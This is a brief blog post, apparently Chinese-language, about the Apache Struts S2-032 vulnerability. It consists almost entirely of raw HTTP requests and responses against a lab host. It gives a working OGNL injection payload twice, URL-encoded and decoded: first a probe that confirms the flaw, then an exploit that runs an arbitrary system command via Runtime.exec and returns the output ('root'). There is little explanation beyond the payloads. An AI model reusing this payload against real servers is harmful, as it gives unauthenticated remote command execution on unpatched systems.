Contents
Struts S2-032 HTTP raw text
<!–more–>
正文
分析
[![s2-032](http://wp.blkstone.me/wp-content/uploads/2019/09/s2_032_20190912.png "s2-032")](http://wp.blkstone.me/wp-content/uploads/2019/09/s2_032_20190912.png "s2-032")
探测请求
POST / HTTP/1.1
Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36
User-Agent: Java/1.8.0_212
Host: 192.168.198.133:8888
Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 209
method%3a%23_memberAccess%3d@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS%2c%23kxlzx%3d+@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%2888888888-1%29%2c%23kxlzx.close
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 9
Date: Thu, 12 Sep 2019 04:07:32 GMT
88888887
OGNL
method:#_memberAccess=@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS,#kxlzx=+@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kxlzx.println(88888888-1),#kxlzx.close
利用请求
POST / HTTP/1.1
Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36
User-Agent: Java/1.8.0_212
Host: 192.168.198.133:8888
Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 498
method:%23_memberAccess%3d%40ognl.OgnlContext%20%40DEFAULT_MEMBER_ACCESS%2c%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%23parameters.command%20%5B0%5D%29.getInputStream%28%29%2c%23b%3dnew%20java.io.InputStreamReader%28%23a%29%2c%23c%3dnew%20%20java.io.BufferedReader%28%23b%29%2c%23d%3dnew%20char%5B51020%5D%2c%23c.read%28%23d%29%2c%23kxlzx%3d%20%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%28%23d%20%29%2c%23kxlzx.close&command=whoami
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Thu, 12 Sep 2019 04:07:32 GMT
2000
root
OGNL
method:#_memberAccess=@ognl.OgnlContext @DEFAULT_MEMBER_ACCESS,#a=@java.lang.Runtime@getRuntime().exec(#parameters.command [0]).getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#kxlzx= @org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kxlzx.println(#d ),#kxlzx.close&command=whoami
Leave a Reply